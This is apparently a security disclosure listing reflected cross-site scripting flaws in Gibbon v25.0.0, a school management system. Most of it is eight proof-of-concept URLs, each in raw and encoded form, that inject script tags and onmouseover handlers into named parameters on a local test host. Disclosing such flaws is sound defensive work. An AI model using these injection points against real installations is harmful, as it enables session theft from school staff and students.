Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.

http://gibbon.local/index.php?q=/modules/Timetable Admin/courseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4'><script>alert(1)</script>lo352 http://gibbon.local/index.php?q=%2fmodules%2fTimetable%20Admin%2fcourseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4%27%3e%3cscript%3ealert(1)%3c%2fscript%3elo352

http://gibbon.local/index.php?q=/modules/Departments/department_course_class.php&gibbonCourseClassID=00002426&currentDate=ceb7h"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f74wd http://gibbon.local/index.php?q=%2fmodules%2fDepartments%2fdepartment_course_class.php&gibbonCourseClassID=00002426&currentDate=ceb7h%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22f74wd

http://gibbon.local/index.php?q=/modules/Markbook/markbook_view.php&gibbonCourseClassID=00002425}}serbb'><script>alert(1)</script>aehos http://gibbon.local/index.php?q=%2Fmodules%2FMarkbook%2Fmarkbook_view.php&gibbonCourseClassID=00002425%7d%7dserbb%27%3e%3cscript%3ealert(1)%3c%2fscript%3eaehos

http://gibbon.local/index.php?q=/modules/Departments/department_course_class.php&gibbonCourseClassID=00002426h6yng"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"pm6bw&currentDate=05/22/2023 http://gibbon.local/index.php?q=%2fmodules%2fDepartments%2fdepartment_course_class.php&gibbonCourseClassID=00002426h6yng%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22pm6bw&currentDate=05%2f22%2f2023

http://gibbon.local/index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001ybibn'><script>alert(1)</script>jvqhopis0qf&search=&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y http://gibbon.local/index.php?q=%2fmodules%2fStaff%2fstaff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001ybibn%27%3e%3cscript%3ealert(1)%3c%2fscript%3ejvqhopis0qf&search=&ttDate=05%2f23%2f2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y

http://gibbon.local/index.php?q=/modules/Timetable Admin/courseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=k9x9d'><script>alert(1)</script>y0uk8&type=Staff&allUsers= http://gibbon.local/index.php?q=%2fmodules%2fTimetable%20Admin%2fcourseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=k9x9d%27%3e%3cscript%3ealert(1)%3c%2fscript%3ey0uk8&type=Staff&allUsers=

http://gibbon.local/index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(1)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y http://gibbon.local/index.php?q=%2fmodules%2fStaff%2fstaff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq%27%3e%3cscript%3ealert(1)%3c%2fscript%3eoq7c8fmwwro&ttDate=05%2f23%2f2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y

http://gibbon.local/index.php?q=/modules/Staff/staff_view_details.php&gibbonPersonID=0000000001&search=&allStaff=&subpage=Personalpy5ei<script>alert(1)</script>pkq71 http://gibbon.local/index.php?q=%2fmodules%2fStaff%2fstaff_view_details.php&gibbonPersonID=0000000001&search=&allStaff=&subpage=Personalpy5ei%3cscript%3ealert(1)%3c%2fscript%3epkq71

Name: Gibbon URL: https://gibbonedu.org Github repo: https://github.com/GibbonEdu/core